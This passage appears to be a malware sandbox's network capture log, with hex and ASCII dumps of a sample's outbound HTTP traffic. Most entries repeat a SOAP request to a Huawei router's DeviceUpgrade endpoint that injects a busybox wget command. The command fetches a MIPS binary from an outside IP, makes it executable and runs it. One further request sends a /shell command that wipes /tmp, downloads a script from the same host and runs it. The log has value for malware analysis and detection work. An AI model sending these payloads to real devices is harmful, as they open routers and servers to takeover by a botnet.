                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:13.202960968 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:17.038337946 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:24.461287975 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:39.307209015 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:09.254992962 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          144192.168.2.235264049.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:09.976232052 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:09Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          145192.168.2.2359842202.75.28.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.025134087 CET614INHTTP/1.1 400 Bad Request
                                                          Server: Mini web server 1.0 ZTE corp 2005.
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache,no-store
                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          146192.168.2.235265649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.748861074 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:10Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          147192.168.2.234087096.67.179.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:10.828260899 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:11.003639936 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:10 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                          Jan 2, 2024 06:24:11.493639946 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:10 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
